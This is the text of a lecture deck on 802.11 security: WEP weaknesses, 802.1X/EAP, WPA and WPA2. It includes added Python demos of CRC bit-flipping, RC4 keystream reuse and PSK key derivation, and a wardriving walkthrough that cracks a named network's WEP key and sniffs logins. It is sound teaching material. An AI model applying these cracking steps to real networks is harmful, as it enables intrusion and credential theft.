Wireless Security
802.11 With a focus on Security
by Brian Lee and Takehiro Takahashi
Survey (1)
- Who has not used wireless?
- Are you confident with your wireless network?
Brief Overview
- Wireless Technology Overview
  - Architecture
  - Features
- Wireless Security Overview
  - Built-in security features in 802.11
  - WEP insecurity
  - 802.1x
  - WPA
  - WPA2 - 802.11i
GOAL
- Understand the state of the art
- WEP is insecure
- But we CAN make a wireless network ‘secure’
802.11 Basics
- Infrastructure Mode or Ad Hoc
- 11 Mbps with 802.11b
  - Feels slow….? (effective speed ~ 50%)
- 802.11 a/b/g/n : Physical Layer Spec
- 802.11i : Security Spec
- 802.11r : QoS
802.11 Built-in Features
- 802.11 frame types
  - Association Request/Response Frame
  - Beacon Frame
  - RTS/CTS Frame
- Shared/Open Authentication
- WEP (Layer 2 security)
  - Integrity
  - Confidentiality
SSID
- Network identifier
- SSID is broadcast in a beacon frame
  - Clear text!
- Change it from the default
  - Cisco = tsunami
  - Linksys = linksys
  - Netgear = netgear
- Stop broadcasting!
MAC Address Filtering
- White-list approach
- Does not scale
- Frame headers are never encrypted
  - Sniffing traffic will reveal valid MAC addresses
- Bottom line…..
  - Prevents casual hacking..
  - Quite useless
Shared/Open Authentication (1)
- 2 ways of initiating communication
  - Shared Key authentication
  - Open Key authentication
- Open Key Auth = no authentication
- Shared Key Auth = requires WEP
Shared Authentication (2)
- The challenge is generated using the PRNG used by WEP
- The challenge is then encrypted using the WEP key and sent back
- This is bad…….. it reveals the WEP key
WEP (Wired Equivalent Privacy)
- Provides “Confidentiality” and “Integrity”.
- Uses 40/104-bit RC4 encryption + CRC32
WEP Encryption
64/40 and 128/104 bits confusion
- IV (24 bits)
- Your WEP key:
  - 5-ASCII-char word = 40 bits
  - 13-ASCII-char word = 104 bits
Security-wise, it’s really 40 bits or 104 bits
Problems with WEP
- 1 static key
  - No encryption is strong if one key is used forever
- Key length is short (40 bits)
  - Brute forcing is possible
  - 104-bit version exists
- Using CRC32
  - CRC is a hash function used to produce a checksum
- Improper use of RC4
  - IV space is too small (24 bits)
- No protection against replay attack
- No specification on key distribution
  - Lacks scalability
CRC32 and WEP
- CRC32 doesn’t have the cryptographic strength seen in MD5 or SHA1
- Bit-flipping is possible
  - Change the data, and WEP won’t catch it
Seems trivial….?
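Why an unkeyed CRC cannot serve as an integrity check, shown in working code. This is an added example, not part of the slides: it verifies the affine property of CRC-32 under XOR, shows that a modification plus a CRC fix-up passes a WEP-style ICV check without the checker noticing, and contrasts that with a keyed MIC (HMAC-SHA256 stands in for a real per-packet MIC). The frame body, the XOR mask and the key are constructed for the demo.

```python
import hashlib
import hmac
import zlib

# Constructed sample frame body and an XOR mask that turns "100" into "900"
# ('1' ^ '9' == 0x08 at offset 4). Invented for this demo.
FRAME = b"PAY 100 TO ALICE"
DELTA = bytes([0, 0, 0, 0, 0x08]) + bytes(len(FRAME) - 5)
MIC_KEY = b"constructed-per-session-key"   # hypothetical integrity key


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_icv(data: bytes) -> int:
    """WEP-style ICV: plain, unkeyed CRC-32 over the data."""
    return zlib.crc32(data) & 0xFFFFFFFF


def crc32_is_affine(a: bytes, b: bytes) -> bool:
    """For equal-length inputs, crc(a ^ b) == crc(a) ^ crc(b) ^ crc(0...0).
    The checksum of a change is therefore predictable from the change alone."""
    zero = bytes(len(a))
    return crc32_icv(xor(a, b)) == crc32_icv(a) ^ crc32_icv(b) ^ crc32_icv(zero)


def modify_against_crc(data: bytes, icv: int, delta: bytes):
    """Apply the XOR mask and fix up the ICV using only the mask; the content
    of 'data' is never needed. Because RC4 is XOR-based, the same fix-up
    applies to the encrypted frame, which is why WEP's ICV misses the change."""
    new_icv = icv ^ crc32_icv(delta) ^ crc32_icv(bytes(len(delta)))
    return xor(data, delta), new_icv


def crc_check_passes(data: bytes, icv: int) -> bool:
    return crc32_icv(data) == icv


def keyed_mic(key: bytes, data: bytes) -> bytes:
    """Keyed integrity tag. Without the key, the tag for modified data
    cannot be computed, so the modification is detected."""
    return hmac.new(key, data, hashlib.sha256).digest()


def mic_check_passes(key: bytes, data: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(keyed_mic(key, data), tag)


def demo():
    """Return (crc_accepts_modified, mic_accepts_modified, modified_data)."""
    icv = crc32_icv(FRAME)
    tag = keyed_mic(MIC_KEY, FRAME)
    new_data, new_icv = modify_against_crc(FRAME, icv, DELTA)
    # The CRC can be adjusted; the keyed tag can only be left as it was.
    return (crc_check_passes(new_data, new_icv),
            mic_check_passes(MIC_KEY, new_data, tag),
            new_data)


if __name__ == "__main__":
    print(demo())   # (True, False, b'PAY 900 TO ALICE')
```

The defender's takeaway is in the last two booleans: the unkeyed ICV accepts the altered frame, the keyed MIC rejects it. This is the gap that Michael (WPA) and the CCMP MIC (WPA2) close.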
RC4 and WEP (1)
- RC4 – Rivest’s Cipher 4
- Stream cipher
- What is a requirement for a stream cipher?
  - Avoid key sequence collision at any cost
  - {M1 XOR RC4-Key} XOR {M2 XOR RC4-Key} = M1 XOR M2
- With WEP, key sequences are repeated every 16 million packets (2 ^ 24)
Key sequence collision doesn’t reveal the WEP key!
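A toy WEP encapsulation, added here to make the "64/40 and 128/104 bits" slide and the keystream-collision identity above concrete; it is not code from the slides. It seeds RC4 with IV || key (3 + 5 bytes for "64-bit" WEP), appends a CRC-32 ICV, and then shows that two frames under the same IV leak M1 XOR M2 and that one known plaintext under an IV decrypts any other frame under that IV, all without the WEP key. The ICV byte order and the sample key, IV and messages are constructed for the demo.

```python
import math
import zlib

IV_BYTES = 3                      # 24-bit IV, sent in the clear
IV_SPACE = 1 << (8 * IV_BYTES)    # 16,777,216 possible IVs


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_seed(iv: bytes, key: bytes) -> bytes:
    """'64-bit' WEP = 24-bit IV + 40-bit key; '128-bit' = 24-bit IV + 104-bit key.
    Only the key part is secret, hence 'really 40 or 104 bits'."""
    if len(iv) != IV_BYTES or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes, key 5 or 13 bytes")
    return iv + key


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """IV || RC4(IV||key) XOR (data || CRC32(data)). ICV byte order is a demo choice."""
    icv = (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")
    body = data + icv
    return iv + xor(body, rc4_keystream(wep_seed(iv, key), len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, ct = frame[:IV_BYTES], frame[IV_BYTES:]
    body = xor(ct, rc4_keystream(wep_seed(iv, key), len(ct)))
    data, icv = body[:-4], int.from_bytes(body[-4:], "little")
    if zlib.crc32(data) & 0xFFFFFFFF != icv:
        raise ValueError("ICV mismatch")
    return data


def ciphertext_xor_equals_plaintext_xor(key, iv, m1, m2) -> bool:
    """Same IV => same keystream, so XOR of the ciphertexts cancels it out."""
    n = min(len(m1), len(m2))
    c1 = wep_encrypt(key, iv, m1)[IV_BYTES:IV_BYTES + n]
    c2 = wep_encrypt(key, iv, m2)[IV_BYTES:IV_BYTES + n]
    return xor(c1, c2) == xor(m1[:n], m2[:n])


def recover_with_known_plaintext(known_frame, known_data, other_frame) -> bytes:
    """One known plaintext under an IV yields that IV's keystream prefix,
    which decrypts any other frame sent under the same IV. The key stays
    unknown, exactly as the slide says."""
    if known_frame[:IV_BYTES] != other_frame[:IV_BYTES]:
        raise ValueError("frames use different IVs")
    keystream = xor(known_frame[IV_BYTES:], known_data)
    return xor(other_frame[IV_BYTES:], keystream)


def expected_packets_until_random_iv_repeat() -> float:
    """Birthday bound: if a card picks IVs at random, a repeat is expected
    after about sqrt(pi/2 * 2^24) ~ 5,100 packets, far short of 16 million."""
    return math.sqrt(math.pi / 2 * IV_SPACE)


# Constructed demo values (not from the slides).
KEY = b"\x01\x02\x03\x04\x05"
IV = b"\x00\x00\x01"
M1 = b"GET /index.html HTTP/1.0\r\n"
M2 = b"user=alice&pass=hunter2\r\n"

if __name__ == "__main__":
    f1, f2 = wep_encrypt(KEY, IV, M1), wep_encrypt(KEY, IV, M2)
    print(recover_with_known_plaintext(f1, M1, f2)[:len(M2)])
```

The 16-million figure on the slide assumes a sequential IV counter; the birthday-bound function shows that random IV selection, which some cards used, makes the first collision far more likely than that.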
RC4 and WEP (2)
- Weak IVs reveal the WEP key
  - 5% chance of guessing the portion of the seed (WEP key) correctly
- FMS attack
  - ~2M packets to decrypt a 40-bit WEP key
  - The time needed is a linear function of the key length
  - A 104-bit key is just as useless as a 40-bit key
Replay Attacks
- Reinjection of captured packets is possible
- IV usage is not specified
Effective WEP cracking
- KoreK attack (Aug. 2004)
  - Another statistical-analysis-based attack on the WEP key
  - Extremely fast
  - Decrypts packets using the CRC32 vulnerability
  - Possible with as little as 0.1M IVs (packets)…
  - Traditional method requires more than 2M packets
  - Accelerate it with packet injection – ARP
A 40-bit WEP key can be cracked in 10 minutes
Fast swapping of the WEP key is no longer safe
Conclusion: WEP
- Confidentiality
  - FMS attack
  - KoreK attack
- Integrity
  - Bit-flipping attack
- Authentication
  - Non-existent
- Attacks can be completely passive
NO MORE WEP
WEP…. 
Wired Equivalent Privacy 
Well.. More like 
What on the Earth does it Protect?
Finally…. we have solutions!
- 802.1x (Authentication)
  - Per-user authentication
  - Key distribution mechanism
- WPA (Confidentiality, Integrity)
  - Subset of 802.11i
  - 2 forms
    - 802.1x Auth + TKIP (Enterprise mode)
    - Pre-shared Key + TKIP
- WPA2 – 802.11i
  - WPA2 is the implementation of 802.11i
  - Uses AES-CCMP
802.1x (Authentication) 
WPA 
WPA2 (802.11i)
802.1X
- 802.1X is a port-based, layer 2 authentication framework
- Not limited to wireless networks
- Uses EAP for implementation
- End result
  - A WEP key for WEP
  - A seed for an encryption key used in WPA/WPA2
802.1X is not an alternative to WEP
802.1x authentication
Extensible Authentication Protocol (EAP)
- Authentication framework
  - Runs on a different layer than 802.1x
- Very flexible
- RADIUS is the de-facto standard
  - A server for remote user authentication and accounting
Implementations
- EAP methods adopted in WPA/WPA2
  - EAP-MD5
  - EAP-LEAP
  - EAP-TLS
  - EAP-TTLS
  - PEAP
EAP-MD5
- EAP-MD5 is a simple EAP implementation
- Uses an MD5 hash of a username and password that is sent to the RADIUS server
- Authenticates only one way
  - Man-in-the-middle attack
- Bottom line: Not recommended
LEAP (EAP-Cisco)
- Like EAP-MD5, it uses a login/password scheme that it sends to the RADIUS server
- Each user gets a dynamically generated one-time key upon login
- Authenticates client to AP and vice versa
- Only guaranteed to work with Cisco wireless clients
- Broken – ASLEAP by Joshua Wright
  - Dictionary attack
EAP-TLS by Microsoft
- Instead of a username/password scheme, EAP-TLS uses certificate-based authentication
- Two-way authentication
- Uses TLS (Transport Layer Security) to pass the PKI (Public Key Infrastructure) information to the RADIUS server
- Compatible with many OSes
- Harder to implement and deploy because a PKI for clients is also required
PEAP by Microsoft and Cisco
- A more elegant solution!
- Very similar to EAP-TLS, except that the client does not have to authenticate itself to the server with a certificate; instead it can use a login/password-based scheme
- Much easier to set up; does not necessarily require a PKI
- Currently works natively with Windows XP SP1 and OS X. An 802.1x supplicant exists for Linux
WPA (Wi-Fi Protected Access)
- Subset of 802.11i
- Confidentiality
  - Fixes the flawed encryption mechanism
  - TKIP: Per-packet dynamic key mechanism
- Integrity
- Upgradeability
  - Software / Firmware upgrade
WPA Mechanism
1. Confirmation of association capability
2. Authentication by 802.1x or PSK
3. 4-way handshake
4. Encryption using TKIP
Very different from WEP, which took care of “everything”
802.1x Authentication (recap)
4 Way Handshake and PTK
802.1x Authentication + PMK
- Security level can be selected
- Pairwise Master Key (PMK) is a seed for temporal key generation used in encryption
- PMK is generated based on the user authentication result
4 Way Handshake and PTK
- PTK (512 bits) splits in 4 ways
- Part of the PTK is used to generate the encryption key (WEP equivalent) in the next phase
4 Way Handshake and PTK
TKIP (Temporal Key Integrity Protocol)
- The heart of the WPA encryption mechanism
- Expands IV space (24 → 48 bits)
- IV sequence is specified
- Generates a key which conforms to WEP
- A fresh key is used for every 16M packets
- Michael
  - Very cheap integrity checker for MAC addresses and DATA
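What "IV sequence is specified" buys, shown as receiver logic; this is an added example covering the Replay Attacks slide and the TKIP slide, not code from the deck. A WEP-style receiver has no rule for the IV and accepts a captured frame again when it is re-sent; a TKIP-style receiver treats the 48-bit TSC as a strictly increasing per-sender counter and drops anything at or below the last accepted value, and the sender must rekey before the counter wraps. The capture is constructed (sender names and counter values are invented).

```python
TSC_BITS = 48
TSC_MAX = (1 << TSC_BITS) - 1
WEP_IV_SPACE = 1 << 24


class WepLikeReceiver:
    """WEP: the IV is just a field with no ordering rule, so a frame captured
    earlier and sent again is accepted again."""
    def accept(self, sender: str, tsc: int) -> bool:
        return True


class TkipLikeReceiver:
    """TKIP: the 48-bit TSC starts at 0 and must strictly increase per sender
    and key. (Real receivers allow a small reorder window per QoS queue;
    the strict rule here is the essence of the replay check.)"""
    def __init__(self):
        self.last = {}

    def accept(self, sender: str, tsc: int) -> bool:
        if not 0 <= tsc <= TSC_MAX:
            return False
        if tsc <= self.last.get(sender, -1):
            return False   # replayed or reordered frame
        self.last[sender] = tsc
        return True


class TkipLikeSender:
    """Sender side: one counter per key. When it would wrap, the key must be
    replaced instead of reused (WEP simply wraps its 24-bit IV)."""
    def __init__(self, start: int = 0):
        self.next_tsc = start

    def next(self) -> int:
        if self.next_tsc > TSC_MAX:
            raise RuntimeError("TSC exhausted: rekey required")
        tsc = self.next_tsc
        self.next_tsc += 1
        return tsc


def sender_needs_rekey(sender: TkipLikeSender) -> bool:
    try:
        sender.next()
        return False
    except RuntimeError:
        return True


def run(receiver, frames):
    """Return the (sender, tsc) pairs the receiver accepted, in order."""
    return [(s, t) for s, t in frames if receiver.accept(s, t)]


# Constructed capture: "aa" sends 1 and 2, then 2 and 1 are replayed,
# then 3 arrives; "bb" sends its own first frame.
FRAMES = [("aa", 1), ("aa", 2), ("aa", 2), ("aa", 1), ("aa", 3), ("bb", 1)]

if __name__ == "__main__":
    print(run(WepLikeReceiver(), FRAMES))   # all six accepted
    print(run(TkipLikeReceiver(), FRAMES))  # the two replays dropped
```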
WPA-PSK
- For home / SOHO use
- Removes 802.1x authentication
- Pre-shared Key + TKIP
- Weak against passive dictionary attack
  - Attacks exist - WPA Cracker
Still MUCH better than WEP
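How the PMK and PTK of the "4 Way Handshake and PTK" slide are actually derived, and why the WPA-PSK slide warns about passive dictionary attacks. This is an added example, not from the deck: in PSK mode the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and the PTK is PRF-512 over the PMK, both MAC addresses and both nonces, then split four ways. The MACs and nonces are visible in the handshake, so the passphrase is the only secret input, which is what makes a good passphrase the whole defence. The SSID, MAC addresses and nonces below are constructed; the derivation steps follow IEEE 802.11i.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is public (beacons carry it), so only the passphrase is secret."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(AA, SPA) || min/max(ANonce, SNonce)).
    Every input except the PMK travels in the clear during the 4-way handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def split_ptk(ptk: bytes) -> dict:
    """The 512-bit PTK split four ways (TKIP layout)."""
    return {
        "KCK": ptk[0:16],    # protects the handshake messages (EAPOL MIC)
        "KEK": ptk[16:32],   # wraps the group key delivered to the client
        "TK": ptk[32:48],    # per-session encryption key (the WEP-key equivalent)
        "MIC": ptk[48:64],   # two 64-bit Michael keys, one per direction
    }


# Constructed handshake values (not from any real capture).
SSID = "linksys"
AA = bytes.fromhex("001122334455")      # access point MAC
SPA = bytes.fromhex("66778899aabb")     # client MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def derive(passphrase: str) -> dict:
    """Passphrase -> PMK -> PTK -> four temporal keys, for the constructed handshake."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    return split_ptk(ptk_from_pmk(pmk, AA, SPA, ANONCE, SNONCE))


if __name__ == "__main__":
    for name, key in derive("correct horse battery staple").items():
        print(name, key.hex())
```

The same derivation is used by WPA2-PSK, which is why the deck's conclusion rates both PSK modes "potentially insecure": the 4096 PBKDF2 iterations slow each guess down, but they do not replace passphrase entropy.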
WPA Security Insight
- No effective attacks found on WPA + 802.1x
- WPA-PSK should be used with care
WPA2 - 802.11i
- The long-awaited security standard for wireless, ratified in June 2004
- Better encryption: AES-CCMP
- Key-caching (optional)
- Pre-authentication (optional)
- Hardware manufactured before 2002 is likely to be unsupported: too weak
PMK Key-Caching
- Skips re-entering of the user credential by storing the host information on the network
- Allows a client to become authenticated with an AP before moving to it
- Useful in encrypted VoIP over Wi-Fi
  - Fast roaming
Conclusion
- WEP = Dead Meat
- WPA-PSK = Potentially Insecure
- WPA + 802.1x (Secure EAP) = Secure
- WPA2-PSK = Potentially Insecure
- WPA2 + 802.1x = Very Secure
Suggested Practice
- Hide SSID
- Do NOT use WEP
- Use WPA-PSK with a good pass-phrase
  - or use WPA with 802.1x if possible
- Get a WPA2-certified product for your next purchase
tinyPEAP (1)
- A self-contained PEAP-enabled RADIUS server
- Currently available in the Linksys WRT54G/GS router and as a Win32 binary
- Native Windows XP SP1 support
- Web-based user management
- The easiest and the most secure solution available at consumer level
tinyPEAP (2)
tinyPEAP (3)
Survey (2)
- Ready to reconfigure your wireless network?
Links to the tools used:
- Airsnort: http://airsnort.shmoo.com
- Netstumbler: http://www.netstumbler.com
- Ethereal: http://www.ethereal.com
- tinyPEAP: http://www.tinypeap.com
Papers and Wireless Security Web Pages
- Weaknesses in the Key Scheduling Algorithm of RC4
- The Unofficial 802.11 Security Web Page
- Wireless Security Blackpaper
- The IEEE 802.11 specifications (includes WEP spec)
- Paper on detecting Netstumbler and similar programs
- Further reading on upcoming 802.11 variations
- Assorted 802.11-related crypto algorithms written in ANSI C
An exercise in wireless insecurity
- Tools used:
  - Laptop w/ 802.11a/b/g card
  - GPS
  - Netstumbler
  - Aircrack (or any WEP cracking tool)
  - Ethereal
  - the car of your choice
Step 1: Find networks to attack
- An attacker would first use Netstumbler to drive around and map out active wireless networks
- Using Netstumbler, the attacker locates a strong signal on the target WLAN
- Netstumbler not only has the ability to monitor all active networks in the area, but it also integrates with a GPS to map APs
WarDriving
Step 2: Choose the network to attack
- At this point, the attacker has chosen his target; most likely a business
- Netstumbler can tell you whether or not the network is encrypted
- Also, start Ethereal to look for additional information.
This time…….
Your target is GTwireless
Step 3: Analyzing the Network
- WLAN has no broadcast SSID
  - Netstumbler tells me that the SSID is GTwireless
- Multiple access points
- Open authentication method
- WLAN is encrypted with 40-bit WEP
- WLAN is not using 802.1X (WEB-auth)
Step 4: Cracking the WEP key
- Attacker sets NIC drivers to Monitor Mode
- Begins capturing packets with Airodump
  - Airodump quickly lists the available network with SSID and starts capturing packets.
- After a few hours of airodump session, launch aircrack to start cracking!
- WEP key for GTwireless is revealed!
Step 5: Sniffing the network
- Once the WEP key is cracked and the NIC is configured appropriately, the attacker is assigned an IP and can access the WLAN
- However, a secure proxy with an SSL-enabled web-based login prevents access to the rest of the network and the Internet
- Attacker begins listening to traffic with Ethereal
Step 6: Sniffing continued…
- Sniffing a WLAN is very fruitful because everyone on the WLAN is a peer; therefore you can sniff every wireless client
- Listening to connections with plain-text protocols (in this case FTP, POP, Telnet) to servers on the wired LAN yielded 2 usable logins within 1.5 hrs
What was accomplished?
- Complete access to the WLAN
- Complete access to the wired LAN
- Complete access to the Internet
- Access to servers on the wired LAN using the sniffed accounts
- Some anonymity. Usage of Netstumbler and other network probing devices can be detected. Skip that step if possible.
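Two of the deck's points in one piece of working code, added here and not taken from the slides: the SSID slide's "clear text" claim (a beacon's SSID element is readable by anyone, and a hidden SSID is just an empty element, which is why Step 3 above could still learn the name) and the remark that active probing tools can be detected. The parser handles beacons and probe requests from a raw 802.11 management header; the detection heuristic counts wildcard-SSID probe requests per source MAC, the behaviour an active scanner produces in volume. All frames, MAC addresses and the threshold are constructed for the demo.

```python
import struct
from collections import Counter

# 802.11 management header: frame control, duration, addr1 (DA), addr2 (SA),
# addr3 (BSSID), sequence control; little-endian, 24 bytes.
MGMT_HDR = struct.Struct("<HH6s6s6sH")
TYPE_MGMT = 0
SUBTYPE_PROBE_REQ = 4
SUBTYPE_BEACON = 8
IE_SSID = 0
IE_RATES = 1
BROADCAST = b"\xff" * 6


def build_mgmt(subtype: int, sa: bytes, bssid: bytes, ies, fixed: bytes = b"") -> bytes:
    """Assemble a minimal management frame (constructed test data, not a capture)."""
    fc = (subtype << 4) | (TYPE_MGMT << 2)
    body = fixed + b"".join(bytes([tag, len(val)]) + val for tag, val in ies)
    return MGMT_HDR.pack(fc, 0, BROADCAST, sa, bssid, 0) + body


def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value elements that follow the fixed fields."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, ln = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def parse_mgmt(frame: bytes):
    """Return subtype, SA, BSSID and SSID of a management frame, else None.
    Nothing here is encrypted: the header and the SSID element are plaintext."""
    if len(frame) < MGMT_HDR.size:
        return None
    fc, _dur, _da, sa, bssid, _seq = MGMT_HDR.unpack_from(frame)
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    subtype = (fc >> 4) & 0xF
    body = frame[MGMT_HDR.size:]
    if subtype == SUBTYPE_BEACON:
        body = body[12:]   # skip timestamp(8) + beacon interval(2) + capability(2)
    ies = parse_ies(body)
    return {"subtype": subtype, "sa": sa.hex(":"), "bssid": bssid.hex(":"),
            "ssid": ies.get(IE_SSID)}   # b"" = hidden (beacon) or wildcard (probe)


def flag_wildcard_probers(frames, threshold: int = 5):
    """Senders of at least `threshold` wildcard-SSID probe requests. Normal
    clients send a few of these too, so the threshold (and a time window,
    omitted here) is what separates a scanner from an ordinary station."""
    counts = Counter()
    for frame in frames:
        p = parse_mgmt(frame)
        if p and p["subtype"] == SUBTYPE_PROBE_REQ and p["ssid"] == b"":
            counts[p["sa"]] += 1
    return sorted(sa for sa, n in counts.items() if n >= threshold)


# Constructed sample traffic: one AP beaconing "linksys", the same AP with SSID
# hiding on, a scanner sending six wildcard probes, and a normal client.
AP = bytes.fromhex("001122334455")
BEACON_FIXED = bytes(8) + (100).to_bytes(2, "little") + (0x0011).to_bytes(2, "little")
BEACON = build_mgmt(SUBTYPE_BEACON, AP, AP,
                    [(IE_SSID, b"linksys"), (IE_RATES, b"\x82\x84")], BEACON_FIXED)
HIDDEN_BEACON = build_mgmt(SUBTYPE_BEACON, AP, AP,
                           [(IE_SSID, b""), (IE_RATES, b"\x82\x84")], BEACON_FIXED)
SCANNER = bytes.fromhex("020000000001")
CLIENT = bytes.fromhex("020000000002")
SAMPLE_FRAMES = (
    [BEACON, HIDDEN_BEACON]
    + [build_mgmt(SUBTYPE_PROBE_REQ, SCANNER, BROADCAST, [(IE_SSID, b"")]) for _ in range(6)]
    + [build_mgmt(SUBTYPE_PROBE_REQ, CLIENT, BROADCAST, [(IE_SSID, b"")])]
    + [build_mgmt(SUBTYPE_PROBE_REQ, CLIENT, BROADCAST, [(IE_SSID, b"linksys")])]
)

if __name__ == "__main__":
    print(parse_mgmt(BEACON)["ssid"], parse_mgmt(HIDDEN_BEACON)["ssid"])
    print(flag_wildcard_probers(SAMPLE_FRAMES))   # ['02:00:00:00:00:01']
```

Hiding the SSID only empties the beacon element; the name still appears in probe responses and in the probe requests of clients that know it, which is why the deck treats "Hide SSID" as hygiene rather than protection.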
Other possibilities
- Instead of sniffing a valid login, the attacker could have exploited a known vulnerability in the proxy (provided there is one)
  - A greater risk of being noticed, something an attacker does not want
That’s it…the network is compromised
- As long as WEP is in place, such an attack is always possible
- Sadly, many are less secure
- How about yours?
More Related Content

What's hot

Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudFotios Lindiakos
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 
Wpa2 psk security measure
Wpa2 psk security measureWpa2 psk security measure
Wpa2 psk security measureShivam Singh
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
RSA - WLAN Hacking
RSA - WLAN HackingRSA - WLAN Hacking
RSA - WLAN HackingJohn Rhoton
 
802.11 mgt-opern
802.11 mgt-opern802.11 mgt-opern
802.11 mgt-opernakruthi k
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols NetProtocol Xpert
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 

What's hot (20)

Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloud
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
Wpa3
Wpa3Wpa3
Wpa3
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?
 
Wpa2 psk security measure
Wpa2 psk security measureWpa2 psk security measure
Wpa2 psk security measure
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
Wi Fi Security
Wi Fi SecurityWi Fi Security
Wi Fi Security
 
WEP
WEPWEP
WEP
 
Kracking WPA2
Kracking WPA2Kracking WPA2
Kracking WPA2
 
Attacking and Securing WPA Enterprise Networks
Attacking and Securing WPA Enterprise NetworksAttacking and Securing WPA Enterprise Networks
Attacking and Securing WPA Enterprise Networks
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
KRACK attack
KRACK attackKRACK attack
KRACK attack
 
RSA - WLAN Hacking
RSA - WLAN HackingRSA - WLAN Hacking
RSA - WLAN Hacking
 
802.11 mgt-opern
802.11 mgt-opern802.11 mgt-opern
802.11 mgt-opern
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 

Viewers also liked

Netstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorNetstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorRoger Espinoza
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Setia Juli Irzal Ismail
 
Ettercap
EttercapEttercap
EttercapTensor
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksSam Bowne
 
Wireless security presentation
Wireless security presentationWireless security presentation
